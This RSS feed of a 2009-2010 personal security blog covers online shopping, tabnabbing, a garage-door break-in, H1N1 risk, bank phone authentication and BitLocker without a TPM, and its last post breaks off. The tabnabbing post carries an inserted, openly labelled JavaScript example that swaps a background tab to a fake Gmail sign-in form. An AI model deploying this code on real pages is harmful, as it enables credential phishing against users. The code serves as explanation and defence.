<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Eric Jacksch &#187; Security</title>
	<atom:link href="http://jacksch.com/category/security/feed/" rel="self" type="application/rss+xml" />
	<link>http://jacksch.com</link>
	<description>Security, photography, writing, opinion, stuff.</description>
	<lastBuildDate>Fri, 27 Aug 2010 23:07:24 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>Buy online with confidence</title>
		<link>http://jacksch.com/2010/08/05/buy-online-with-confidence/</link>
		<comments>http://jacksch.com/2010/08/05/buy-online-with-confidence/#comments</comments>
		<pubDate>Thu, 05 Aug 2010 14:00:02 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://jacksch.com/?p=4063</guid>
		<description><![CDATA[I&#8217;ve made a lot of online purchases and I often purchase goods online to take advantage of better selection and prices.   For example, I recently ordered a larger drive for my desktop PC.  Newegg and Tiger Direct both had a good product for a good price, and shipping was reasonable considering the cost of [...]]]></description>
			<content:encoded><![CDATA[
<p>I&#8217;ve made a lot of online purchases and I often purchase goods online to take advantage of better selection and prices.   For example, I recently ordered a larger drive for my desktop PC.  Newegg and Tiger Direct both had a good product for a good price, and shipping was reasonable considering the cost of gas and my time to go to the store.</p>
<p>I&#8217;ve only had two bad online experiences, and I got my money back both times.  Yet I continue to hear horror stories from others.  So I thought I&#8217;d share my approach.</p>
<p>First and foremost, there is nothing magic about shopping online.  The major difference when you walk into a shop is that you have a good idea where they are located. However, disreputable bricks-and-mortar stores (along with phone and mail order outfits) ripped off consumers for years before the Internet was invented.</p>
<p>So how can we shop online with confidence?</p>
<p>1) Consider ordering from businesses you know.  Saving a few dollars on an unknown vendor may not be worth it.</p>
<p>2) If you&#8217;re looking for something and don&#8217;t know where to find it, consider using eBay or Amazon. Carefully check feedback on the vendor before buying.</p>
<p>3) Always pay by credit card.  From time to time you may run across vendors who request payment by other means.  They might want you to wire money using Western Union or a similar service.  The problem is that once you&#8217;ve sent your money, there is little you can do about it.  Real online merchants accept credit cards or use a service like PayPal that accepts credit cards on their behalf. Period.</p>
<p>4) Understand any rules that apply to disputes.  For example, if you make a purchase on eBay and pay using PayPal you must open a dispute within 45 days.  Be wary of anyone who may be trying to string you along with a series of excuses, delays and apologies.</p>
<p>5) Next to how they treat other customers, the best predictor of how a business will treat you after getting your money is how they treat you before. When shopping online we often have our choice of products and resellers.  When I&#8217;m trying to decide, I&#8217;ll often email a few vendors to ask their advice or for product information.  The timeliness and quality of their response speaks volumes about them.</p>
<p>Have other words of wisdom to share?  Please comment!</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2010/08/05/buy-online-with-confidence/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Tabnabbing</title>
		<link>http://jacksch.com/2010/07/07/tabnabbing/</link>
		<comments>http://jacksch.com/2010/07/07/tabnabbing/#comments</comments>
		<pubDate>Thu, 08 Jul 2010 01:05:54 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://jacksch.com/?p=4050</guid>
		<description><![CDATA[Aza Raskin has an interesting article on his blog about tabnabbing.  In summary, an attacker can use JavaScript that sits quietly on a page, waits until the page is no longer in the foreground (for example when you have switched to another tab in your browser), and then switches it to a legitimate-looking phishing page.  For [...]]]></description>
			<content:encoded><![CDATA[
<p>Aza Raskin has an <a href="http://www.azarask.in/blog/post/a-new-type-of-phishing-attack/" target="_blank">interesting article on his blog about tabnabbing</a>.  In summary, an attacker can use JavaScript that sits quietly on a page, waits until the page is no longer in the foreground (for example when you have switched to another tab in your browser), and then switches it to a legitimate-looking phishing page.  For example, you could be reading a blog, switch to another tab to do something else, and then click on a tab that looks like a Gmail login &#8212; when it is in fact a phishing page.</p>
<p>This is yet another example of why passwords are a really bad idea.  However, from a practical perspective, the best thing you can do is to ensure that you have opened a tab yourself before logging in.  If you click to a tab and find yourself at a login screen, close the tab, open a new one, and navigate to the site you want.  Before typing a password, also look at the address bar: a nabbed tab can change its title, favicon and contents, but not the domain it was loaded from.</p>
<p>Thanks  to Thorin for the link!</p>
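<p>The mechanism described above as an added example, not Raskin&#8217;s proof of concept and not code from this post: the swap logic is written as a small state machine so it can be exercised without a browser, and the DOM wiring at the bottom only runs inside a page. The five-second wait, the page titles, the favicon URLs and the form markup are all constructed for the example; the origin check at the end is the practical tell for the user, since script can forge everything in the tab except the address it was loaded from.</p>

```javascript
// Added example, not code from jacksch.com or from Raskin's demo page.
// Tabnabbing modelled as a state machine (runs under Node); DOM wiring at the end.

// Constructed value: how long the tab must stay in the background before it
// changes its face. The user has to have stopped looking at it.
const DORMANT_MS = 5000;

// Two faces of the same tab. Title, favicon and body can all be replaced from
// script; the origin in the address bar cannot be.
const FACES = {
  legit: {
    title: 'A blog post',
    favicon: '/favicon.ico',
    body: '<article><h1>A blog post</h1><p>Something worth reading.</p></article>',
  },
  phish: {
    title: 'Gmail: Email from Google',
    favicon: 'https://mail.google.com/favicon.ico',
    body: '<h1>Sign in</h1><form><input name="Email"><input name="Passwd" type="password"><button>Sign in</button></form>',
  },
};

class Tabnabber {
  // `now` is injectable so the timing can be tested without waiting.
  constructor(now = () => Date.now()) {
    this.now = now;
    this.face = 'legit';
    this.hiddenSince = null; // timestamp at which the tab went to the background
  }

  // Called on every visibilitychange; `hidden` mirrors document.hidden.
  onVisibility(hidden) {
    if (!hidden) {
      this.hiddenSince = null; // user came back: the wait starts over next time
    } else if (this.hiddenSince === null) {
      this.hiddenSince = this.now();
    }
  }

  // Polled on an interval. Swaps to the phishing face once the tab has been
  // continuously hidden for DORMANT_MS, and never swaps back.
  tick() {
    if (this.face === 'legit' && this.hiddenSince !== null &&
        this.now() - this.hiddenSince >= DORMANT_MS) {
      this.face = 'phish';
    }
    return this.face;
  }

  // Applies the current face to a DOM document: title, favicon and body.
  render(doc) {
    const f = FACES[this.face];
    doc.title = f.title;
    let icon = doc.querySelector('link[rel~="icon"]');
    if (!icon) {
      icon = doc.createElement('link');
      icon.rel = 'icon';
      doc.head.appendChild(icon);
    }
    icon.href = f.favicon;
    doc.body.innerHTML = f.body;
  }
}

// The user's check: the origin actually loaded versus the one the login page
// should have. A nabbed tab still carries the origin of the page you left.
function originOf(href) {
  return new URL(href).origin;
}

function safeToEnterCredentials(href, expectedOrigin) {
  return originOf(href) === expectedOrigin;
}

// Browser-only wiring; skipped when run under Node.
if (typeof document !== 'undefined') {
  const nab = new Tabnabber();
  let rendered = false;
  document.addEventListener('visibilitychange', () => nab.onVisibility(document.hidden));
  setInterval(() => {
    if (!rendered && nab.tick() === 'phish') { nab.render(document); rendered = true; }
  }, 500);
}
```

<p>Nothing here requires a vulnerability in the browser or the site being imitated; it is ordinary script behaviour on a page you chose to open, which is why the only defence in the user&#8217;s hands is to navigate to the login page yourself and to read the address bar.</p>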
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2010/07/07/tabnabbing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Garage break-in technique exposed</title>
		<link>http://jacksch.com/2010/06/11/garage-break-in-technique-exposed/</link>
		<comments>http://jacksch.com/2010/06/11/garage-break-in-technique-exposed/#comments</comments>
		<pubDate>Fri, 11 Jun 2010 13:00:07 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Home]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://jacksch.com/?p=4011</guid>
		<description><![CDATA[As a security professional, I sometimes struggle with how much information to divulge about security vulnerabilities.  However, by the time it makes YouTube and links circulate in email, my general thought is that criminals already know about it and the benefits of informing the public outweigh the risk. As you can see in this YouTube [...]]]></description>
			<content:encoded><![CDATA[
<p>As a security professional, I sometimes struggle with how much information to divulge about security vulnerabilities.  However, by the time it makes YouTube and links circulate in email, my general thought is that criminals already know about it and the benefits of informing the public outweigh the risk.</p>
<p>As you can see in this YouTube video, it is possible to open many residential garage doors using only a simple wedge and a wire hook.  What was intended as a safety feature to allow the door to be opened without power creates a security vulnerability.  Using a plastic cable tie might be the best way to address this, provided that you have a way to cut the cable tie if you need to open the door during a power failure.</p>
<p><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/CMz1tXBVT1s&#038;hl=en_US&#038;fs=1&#038;"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/CMz1tXBVT1s&#038;hl=en_US&#038;fs=1&#038;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2010/06/11/garage-break-in-technique-exposed/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Weather Warnings and You</title>
		<link>http://jacksch.com/2010/06/10/weather-warnings-and-you/</link>
		<comments>http://jacksch.com/2010/06/10/weather-warnings-and-you/#comments</comments>
		<pubDate>Thu, 10 Jun 2010 12:00:53 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://jacksch.com/?p=4008</guid>
		<description><![CDATA[There&#8217;s a good article on weather watches, weather warnings, and you over at The Squid Zone.]]></description>
			<content:encoded><![CDATA[
<p>There&#8217;s a good article on <a href="http://www.squidzone.ca/the_squid_zone/2010/06/weather-watch-weather-warning-and-you.html" target="_blank">weather watches, weather warnings, and you over at The Squid Zone</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2010/06/10/weather-warnings-and-you/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>H1N1: A case study in poor risk decisions</title>
		<link>http://jacksch.com/2009/11/28/managing-ph1n1-riskpoorly/</link>
		<comments>http://jacksch.com/2009/11/28/managing-ph1n1-riskpoorly/#comments</comments>
		<pubDate>Sat, 28 Nov 2009 15:00:00 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Children]]></category>
		<category><![CDATA[Current Affairs]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/?p=3843</guid>
		<description><![CDATA[In security circles we often discuss why some individuals and businesses find themselves in a perpetual state of high risk. While there can be complex factors, the bottom line is that many of us make poor risk management decisions in our business and personal lives. Sometimes a high risk position results because we don’t correctly [...]]]></description>
			<content:encoded><![CDATA[
<p>In security circles we often discuss why some individuals and businesses find themselves in a perpetual state of high risk. While there can be complex factors, the bottom line is that many of us make poor risk management decisions in our business and personal lives.</p>
<p>Sometimes a high risk position results because we don’t correctly assess asset values, threats or vulnerabilities. Sometimes the cost of implementing a safeguard exceeds the expected loss, and the decision to accept risk is a logical one. And sometimes we simply make mistakes.</p>
<p>But there are other reasons that we Canadians are often too polite to point out: Laziness, denial, rationalization and risk decisions based upon emotion rather than logic.  The H1N1 &#8216;flu gives us plenty of examples.</p>
<p>We’re in the midst of an influenza pandemic.  Fortunately we know how to create ‘flu vaccines &#8212; we do it every year to combat the seasonal flu. So we have a vaccine, and every credible organization from the World Health Organization down to our local medical officers is recommending that we vaccinate ourselves and our families.</p>
<p>The risk is clear: pH1N1 is a nasty virus that, at best, will make you sick for a week or two.  At worst, it could kill you. The threat is real and much of the resulting risk can be mitigated by a simple vaccination.  The Public Health Agency of Canada advises that, “without interventions like a vaccine and antivirals, close to 25 to 35 percent of the population could become ill over the period of a few months.”  Other health organizations have released similar estimates. The vaccine has been tested in Canada as well as other countries, and we know that approximately 1 in 100,000 people will have a serious reaction to it, as with any other vaccine.  (Source: <a title="http://www.phac-aspc.gc.ca/alert-alerte/h1n1/vacc/options-eng.php" href="http://www.phac-aspc.gc.ca/alert-alerte/h1n1/vacc/options-eng.php">http://www.phac-aspc.gc.ca/alert-alerte/h1n1/vacc/options-eng.php</a>)</p>
<p>From a risk management perspective it doesn’t get much simpler than this. The benefits of the vaccine clearly outweigh the risks, and the cost (a few hours of our time at most) is minimal compared to the potential loss.  And that doesn’t take ethics and social responsibility into account.   Those who choose not to be vaccinated not only may become ill, but could also pass H1N1 on to more vulnerable family, friends and colleagues &#8212; including those who can&#8217;t be vaccinated due to allergies.</p>
<p>Yet we continue to see people announce on the Internet that they’re not getting vaccinated. Some quote “facts” that are uninformed myths at best.  Some focus on the 1 in 100,000 serious reaction rate and completely lose perspective.  Others ignore a century or so of medical science and proclaim that they don’t need a vaccination because they are &#8220;healthy and take their herbs and vitamins.”</p>
<p>Chances are that you’ve already seen the writings of otherwise intelligent parents who are incapable of making good risk management decisions. Their blog posts usually start with how much they love their kids.  Then they latch on to the one quack that charges people $50 each to attend a seminar to learn “the truth” and rationalize that “the medical community don’t all agree”.  They focus on the danger of mercury in vaccines, even though the exposure is less than you’d get from eating a can of tuna.  Or they repeat silly claims like suggesting that the vaccine is “untested”.</p>
<p>Some of these people obviously have other agendas.  It&#8217;s clear from their writing that they&#8217;re simply anti-vaccination shills. They write clever &#8220;balanced&#8221; articles pitting fact against laughable fiction and seek to &#8220;support&#8221; others who share their defective logic.</p>
<p>Some see themselves as rebels, not &#8220;giving in&#8221; to the experts who tell them they should be vaccinated.  The old phrase, &#8220;Rebels without a clue&#8221; comes to mind.</p>
<p>In others, the barrage of H1N1 information creates neurotic behaviour and they operate on a completely emotional level. They &#8220;agonize&#8221; (often at length and in writing) about how &#8220;difficult&#8221; the decision was.  They lose all perspective, and should you dare point out the flaws in their reasoning their feelings are hurt. How dare you suggest that they don’t know what’s best. They behave as if the act of conceiving a child instantly made them more knowledgeable on vaccines than the WHO, CDC, and the medical experts of countless countries, including their own. They have “the right” not to vaccinate themselves and their children, and as emotional people often do, they confuse having a right with it being the right thing to do.</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/11/28/managing-ph1n1-riskpoorly/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Do as we say, not as we do.</title>
		<link>http://jacksch.com/2009/10/19/do-as-we-say-not-as-we-do/</link>
		<comments>http://jacksch.com/2009/10/19/do-as-we-say-not-as-we-do/#comments</comments>
		<pubDate>Mon, 19 Oct 2009 11:00:00 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Business]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/?p=3786</guid>
		<description><![CDATA[We often hear banks complaining loudly about the losses they suffer from payment card fraud.  Campaigns like “Protect your PIN” and humorous commercials with a miniature armoured truck following a customer down the street must cost tens of millions of dollars. But then consumers still receive calls like I did on Saturday afternoon.  The bank [...]]]></description>
			<content:encoded><![CDATA[
<p>We often hear banks complaining loudly about the losses they suffer from payment card fraud.  Campaigns like “Protect your PIN” and humorous commercials with a miniature armoured truck following a customer down the street must cost tens of millions of dollars.</p>
<p>But then consumers still receive calls like I did on Saturday afternoon.  The bank – or someone claiming to be from the bank – called me, advised that they were recording the call, welcomed me as a new customer, and then asked me for my date of birth and postal code, “to confirm they were speaking to the right person.” </p>
<p>I have a very simple rule: If I call you, it’s reasonable for you to ask me to prove I am who I say I am.  However, if you call me, you get to go first.  And unfortunately, while banks are somewhat good at authenticating their customers, they never seem to consider how customers should authenticate them.</p>
<p>When I declined to provide personal information to the caller, she politely replied that I could call the number on the back of my card if I had any questions and then she ended the call.</p>
<p>So I did just that, and asked about the call.  The CSR verified that the person who called me was indeed from the bank, and that they ask for a date of birth and postal code to make sure they’re speaking with the “right person”. But he didn’t have a solution to how I should authenticate future callers who claim they’re from the bank.</p>
<p>Banks should know better.  Telephoning customers and asking for personal information is irresponsible and contributes to the identity theft problem.  Banks should be telling their customers that they will never call them and ask for personal information – just as they currently do for PINs.</p>
<p>There’s also an obvious solution: The bank could easily add one more field to their database, a password that they will use when they call me. In fact, next time they do call, I think I’ll ask them for their telephone password.</p>
<p>Perhaps the bank’s security, fraud and marketing people need to have a chat.</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/10/19/do-as-we-say-not-as-we-do/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>30 years of failure</title>
		<link>http://jacksch.com/2009/10/14/30-years-of-failure/</link>
		<comments>http://jacksch.com/2009/10/14/30-years-of-failure/#comments</comments>
		<pubDate>Wed, 14 Oct 2009 11:05:00 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/2009/10/14/30-years-of-failure/</guid>
		<description><![CDATA[Ars Technica has a great article this morning entitled 30 years of failure: the username/password combination. One of the things that they didn’t discuss is why we continue to use passwords for authentication even though they’re known to be a serious weakness. The first reason is that, as long as we don’t include the cost [...]]]></description>
			<content:encoded><![CDATA[
<p>Ars Technica has a great article this morning entitled <a href="http://arstechnica.com/business/news/2009/10/30-years-of-failure-the-user-namepassword-combination.ars" target="_blank">30 years of failure: the username/password combination</a>.</p>
<p>One of the things that they didn’t discuss is why we continue to use passwords for authentication even though they’re known to be a serious weakness. The first reason is that, as long as we don’t include the cost of a security breach, passwords are free.  The second is that while better authentication technologies exist, nobody seems interested in allowing a single credential to be used across multiple systems on the Internet. I should be able to carry one authentication device and use it everywhere, but instead when we go that route we end up with a key-ring full of devices.</p>
<p>Perhaps it’s time for the open source community to step up to the plate?</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/10/14/30-years-of-failure/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows 7 BitLocker, a practical solution</title>
		<link>http://jacksch.com/2009/10/13/windows-7-bitlocker-a-practical-solution/</link>
		<comments>http://jacksch.com/2009/10/13/windows-7-bitlocker-a-practical-solution/#comments</comments>
		<pubDate>Tue, 13 Oct 2009 12:00:00 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/?p=3783</guid>
		<description><![CDATA[I recently installed Windows 7 Ultimate (32 bit) on my brand new HP Mini 110 (it ships with XP). The Windows 7 distribution included all the drivers needed to get the system up and running, including the WiFi drivers, making it a very painless process.  Once running, it automatically downloaded the vendor-specific video driver, resulting [...]]]></description>
			<content:encoded><![CDATA[
<p>I recently installed Windows 7 Ultimate (32 bit) on my brand new HP Mini 110 (it ships with XP). The Windows 7 distribution included all the drivers needed to get the system up and running, including the WiFi drivers, making it a very painless process.  Once running, it automatically downloaded the vendor-specific video driver, resulting in a fully operational system.  The only driver I had to manually install was for the touchpad. The Windows 7 driver worked fine, but I couldn’t use functions like vertical scrolling until I downloaded the software from Synaptics.</p>
<p>I’m a strong proponent of whole disk encryption, especially on portable computers.  The small size and weight of the HP Mini 110 make it an easier target for thieves. However, by default Windows 7 creates two hard drive partitions, a hidden one for boot and recovery, and a second main partition for the operating system. My favourite open source encryption software, <a href="http://www.truecrypt.org/" target="_blank">TrueCrypt</a>, won’t do whole hard drive encryption on Windows 7…at least not yet. So I decided to give Microsoft’s BitLocker a try.</p>
<p>BitLocker is designed to work on PCs that include a Trusted Platform Module (TPM) chip on their motherboard. The TPM does not hold the disk encryption key outright: it seals the key that unlocks the volume, and releases it at boot only if the measured boot components match the values recorded when BitLocker was turned on. The system can also be configured so that users must enter a PIN at the TPM in order to boot their computer.</p>
<p>While that’s a nice plan, it doesn’t help those of us who have purchased a computer that doesn’t include a TPM, and I was somewhat disappointed to learn that the HP Mini 110 falls into that category. But searching the web I quickly learned that BitLocker can be used without a TPM chip by making a group policy change. (Detailed information can be found <a href="http://technet.microsoft.com/en-us/library/cc766295(WS.10).aspx" target="_blank">here</a>.) Once the feature is enabled, the BitLocker key can be stored on a USB flash drive.</p>
<p>This scenario is not ideal because the key is not protected – anyone who gets their hands on the USB key can duplicate the key and use either it or the duplicate to boot the computer.  However, it’s certainly better than the alternative, which is to not use hard drive encryption until third-party products catch up with Windows 7. If you protect your USB key like you protect your car keys, it does provide a practical defence against a thief accessing your data.</p>
<p>But if you’re like me, you probably keep your USB flash drive in your briefcase, making it vulnerable to theft along with your laptop.  It’s like leaving your car keys sitting on top of the hood. I mentioned this challenge to a few colleagues, and one of them introduced me to a very cool product from Verbatim, the TUFF-&#8217;N&#8217;-TINY&#8482; USB flash drive.</p>
<p><a href="http://techlifepost.com/wp-content/uploads/96816_03_c.png"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="96816_03_c" src="http://techlifepost.com/wp-content/uploads/96816_03_c_thumb.png" border="0" alt="96816_03_c" width="480" height="480" /></a></p>
<p><em>Image courtesy of Verbatim</em></p>
<p>In addition to having the smallest form factor I’ve seen in a USB flash drive, the Tuff-‘N’-Tiny is dust, water, and static discharge resistant.  It also includes a short key ring lanyard, which I highly recommend you use.</p>
<p>BitLocker only requires the USB key during the initial boot sequence, after which it tells you to remove the key, so the Tuff-‘N’-Tiny soon hung on my keychain as the “ignition key” for my HP Mini.</p>
<p>The Tuff-‘N’-Tiny also includes Verbatim’s V-Safe encryption software.  Unlike many USB devices that mount both a public (unencrypted) and secure (encrypted) partition, V-Safe switches the user between the unencrypted and encrypted partition on the same drive letter.  At first this seemed a bit unusual, but I quickly realized that, in addition to requiring only one drive letter for the device, this scheme also prevents the user from accidentally saving sensitive files to the unencrypted partition. Once you’ve entered your passphrase, only the encrypted partition is available.</p>
<p>Getting back to BitLocker, I think we’ll all agree that it is best used with a TPM chip.  However, while not perfect from a security perspective, it is possible to use Windows 7 BitLocker for practical whole hard drive encryption without a TPM chip provided that you store the USB key separate from the computer. And so far, at least for me, attaching a small USB flash drive to my keychain appears to be the best option.</p>
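<p>The procedure above as an added example, not a script from this post or from Microsoft: it is for Windows 7 Ultimate or Enterprise, run from an elevated PowerShell prompt, and assumes the operating system volume is C: and the USB flash drive is mounted as E:. The registry values are the ones the Group Policy editor writes for &#8220;Require additional authentication at startup&#8221; with &#8220;Allow BitLocker without a compatible TPM&#8221; ticked (gpedit.msc does the same thing by hand), and the switches are those of the Windows 7 manage-bde command-line tool.</p>

```powershell
# Added example (not from jacksch.com): enable BitLocker on a Windows 7 netbook
# that has no TPM, using a USB startup key. Run from an elevated PowerShell prompt.
# Assumptions: OS volume is C:, the USB flash drive is E:\ (both constructed here).

$osVolume = 'C:'
$usbDrive = 'E:\'

# 1. Confirm there really is no usable TPM. Win32_Tpm returns nothing on a
#    machine like the HP Mini 110; if one is present, prefer TPM+PIN instead.
$tpm = Get-WmiObject -Namespace 'root\cimv2\Security\MicrosoftTpm' -Class Win32_Tpm -ErrorAction SilentlyContinue
if ($tpm -and $tpm.IsEnabled().IsEnabled) {
    Write-Warning 'A TPM is present and enabled; use it rather than a bare USB key.'
}

# 2. Local-policy equivalent of "Require additional authentication at startup"
#    with "Allow BitLocker without a compatible TPM". 2 = allowed, 1 = required,
#    0 = not allowed for the four Use* values.
$fve = 'HKLM:\SOFTWARE\Policies\Microsoft\FVE'
if (-not (Test-Path $fve)) { New-Item -Path $fve -Force | Out-Null }
$policy = @{
    UseAdvancedStartup = 1
    EnableBDEWithNoTPM = 1
    UseTPM             = 2
    UseTPMPIN          = 2
    UseTPMKey          = 2
    UseTPMKeyPIN       = 2
}
foreach ($name in $policy.Keys) {
    New-ItemProperty -Path $fve -Name $name -PropertyType DWord -Value $policy[$name] -Force | Out-Null
}

# 3. Turn BitLocker on with a startup key written to the USB drive and a
#    numerical recovery password as the fallback for a lost key. manage-bde
#    prints the 48-digit recovery password: record it somewhere that is
#    neither the netbook nor the USB key.
& manage-bde.exe -on $osVolume -StartupKey $usbDrive -RecoveryPassword

# 4. Verify: the protectors should list "External Key" and "Numerical Password",
#    and the status should show encryption pending a restart.
& manage-bde.exe -protectors -get $osVolume
& manage-bde.exe -status $osVolume
```

<p>manage-bde schedules a hardware test for the next reboot, so restart with the USB key inserted; encryption starts once the test passes. The startup key it writes is a small .BEK file with no protection of its own, which is exactly the limitation described above: whoever holds the drive can copy it and boot the machine. Without the recovery password, losing that drive means losing the disk, so treat the printed password as carefully as the key itself.</p>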
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/10/13/windows-7-bitlocker-a-practical-solution/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What would you do?</title>
		<link>http://jacksch.com/2009/09/02/what-would-you-do/</link>
		<comments>http://jacksch.com/2009/09/02/what-would-you-do/#comments</comments>
		<pubDate>Thu, 03 Sep 2009 00:25:00 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Current Affairs]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/?p=3753</guid>
		<description><![CDATA[The events Monday night in Toronto have the media and net buzzing.  (If you haven’t read about it yet, this Toronto Star article will get you started). While facts, opinions, observations, and premature conclusions dribble out in response to seemingly insatiable public curiosity, there is a question few are asking: What would you do? Incidents like this are [...]]]></description>
			<content:encoded><![CDATA[
<p>The events Monday night in Toronto have the media and net buzzing.  (If you haven’t read about it yet, <a href="http://www.thestar.com/News/GTA/article/689771" target="_blank">this Toronto Star article</a> will get you started). While facts, opinions, observations, and premature conclusions dribble out in response to seemingly insatiable public curiosity, there is a question few are asking: What would you do?</p>
<p>Incidents like this are complex and journalists have a difficult job. The facts are difficult to ascertain and they must try to make sense of what they can learn. Only one person could have told us, for a fact, exactly what happened on Monday night. Unfortunately he was allegedly intoxicated at the time and died shortly afterward. The other party obviously knows the details of his own involvement, but not the history. And since he’s been charged with a crime it would be silly for him to discuss it with anyone other than his lawyer.</p>
<p>Many Canadians are under the false impression that our criminal justice system is about determining the truth.  It isn&#8217;t.  Truth, if found, is a by-product, not the primary objective.  Our criminal justice system considers only the evidence produced in court. The Crown tries to introduce sufficient evidence to prove guilt beyond a reasonable doubt, while the individual may or may not introduce evidence in support of their innocence. And in the end, the accused is found either “guilty” or “not guilty”.  The verdict of “innocent” doesn’t exist in our system.</p>
<p>Our criminal justice system also operates after the fact. Our laws tell us what we must not do, but rarely provide practical guidance. In fact, they are often such a complex mix of statute and precedent that even lawyers don&#8217;t agree on what the law actually is. And when the proverbial fertilizer hits the rotary bladed object, nobody is thinking about that anyway.</p>
<p>I’m not going to contribute to the speculation on what happened. Instead, I’m going to ask you to discard whatever preconceptions you have and consider three <em><strong>hypothetical</strong></em> situations:</p>
<ol>
<li>You’re a police officer called to a minor disturbance. The person who appears to be causing it is somewhat intoxicated and has a bicycle, but hasn’t broken the law, at least not seriously. You determine that he should go home. What would you do?</li>
<li>You’re an alcoholic who has fallen off the wagon. The police have told you to go home, you’re riding your bicycle drunk, and you have a minor collision with a guy in a Saab. He’s angry with you and you’re angry with him. You exchange words and he begins to drive away. What would you do?</li>
<li>You and your wife are driving home from an anniversary dinner in a convertible. You’re involved in a minor collision with a cyclist.  He doesn’t appear hurt, just angry. Drunk and angry. He picks up his bike and throws it on the ground and slams his bag on your hood. You decide to drive away to end the confrontation, but he chases after your car and grabs on to the driver&#8217;s door. What would you do?</li>
</ol>
<p>We don’t know for sure what happened on Monday, and before we speculate on whether Michael Bryant should be punished for it, we should be asking not only what happened, but also what we would do in his shoes.</p>
<p>A small group of cyclists in Toronto appear very polarized around this event. They’re trying to turn this into a cyclist vs. motorist issue. Understandably, many cyclists feel that drivers don’t respect their right to be on the road and point to this as an example.  On the other hand, many drivers are frustrated by cyclists who on one hand demand to be treated as equals on the road, yet ignore the rules of the road when it suits them. Then there are those of us who have driven cars, trucks, bicycles and motorcycles – and we’ve literally seen it from all angles.</p>
<p>While the dialog that may ensue about how motorists and bicycles can best share the road might prove productive, that’s not what this case is about. They’re separate issues. This case is about two men who had an encounter that I wouldn’t wish on anyone. One of them, Michael Bryant, stands charged with a crime and at best will be forced to spend a small fortune to defend himself. The other, Darcy Allan Sheppard, is dead.</p>
<p>And the question remains:  What would you do?</p>
]]></content:encoded>
			<wfw:commentRss>http://jacksch.com/2009/09/02/what-would-you-do/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Evidence Eliminator is a bad idea</title>
		<link>http://jacksch.com/2009/09/01/evidence-eliminator-is-a-bad-idea/</link>
		<comments>http://jacksch.com/2009/09/01/evidence-eliminator-is-a-bad-idea/#comments</comments>
		<pubDate>Tue, 01 Sep 2009 23:00:00 +0000</pubDate>
		<dc:creator>Eric</dc:creator>
				<category><![CDATA[Privacy]]></category>
		<category><![CDATA[Security]]></category>

		<guid isPermaLink="false">http://techlifepost.com/?p=3752</guid>
		<description><![CDATA[By now most of us know that when we delete a file from our computer it isn’t really gone – the space is merely marked as being available for reuse. Unlike in the physical world, where we can easily shred or burn documents we wish to dispose of (and put the others out in the [...]]]></description>
			<content:encoded><![CDATA[
<p>By now most of us know that when we delete a file from our computer it isn’t really gone – the space is merely marked as being available for reuse. Unlike in the physical world, where we can easily shred or burn documents we wish to dispose of (and put the others out in the same trash bag as the kitchen waste and used kitty litter) it’s relatively hard to do the same on our PCs.</p>
